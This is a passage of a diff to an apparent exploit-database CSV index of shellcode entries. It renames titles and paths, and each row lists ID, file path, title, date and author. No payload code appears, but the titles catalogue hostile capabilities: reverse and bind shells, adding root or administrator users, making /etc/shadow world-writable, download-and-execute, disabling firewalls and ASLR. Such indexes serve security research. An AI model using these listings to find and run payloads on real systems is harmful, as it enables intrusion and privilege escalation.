bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 -18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 +18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 -18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 +18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 -21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 -21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 +21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 -40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 +40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 -40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 +40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 -27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 +27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 -29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0 -40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator 'BroK3n' Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 +28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Null-FreeShellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 +29436,platforms/linux_mips/shellcode/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode,0 +40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 -34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 -34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 -34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 +34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 +34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 +34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 -35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 -35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 +35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 +35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 -36411,platforms/win_x86-64/shellcode/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86-64,shellcode,0 -36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 -36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 +36411,platforms/generator/shellcode/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",generator,shellcode,0 +36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 +36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 -36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell (192.168.1.133:33333) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 +36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 -36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 -36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 +36673,platforms/generator/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",generator,shellcode,0 +36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 -36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 -36780,platforms/win_x86/shellcode/36780.c,"Win32/XP SP3 - Restart computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 -36781,platforms/lin_x86/shellcode/36781.py,"Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0 +36779,platforms/win_x86/shellcode/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 +36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 +36781,platforms/generator/shellcode/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode,0 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 -36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 +36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 -37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 -37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 +37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 +37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Shell Netcat 5555/TCP Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 -37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 +37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 +37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 -37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec(_/bin/dash_) Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 -37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 -37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 +37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 +37664,platforms/win_x86/shellcode/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 -37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 -37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 +37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 +37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 -38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 -38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 +38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 +38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 -38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 +38094,platforms/generator/shellcode/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",generator,shellcode,0 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 -38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - Bind 4444/TCP Null-free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 -38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 -38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 +38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 +38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 +38194,platforms/android/shellcode/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 -38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 +38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 -38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)",2015-12-13,B3mB4m,generator,shellcode,0 -39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 -39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 +38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 +39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 +39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 +39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 -39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 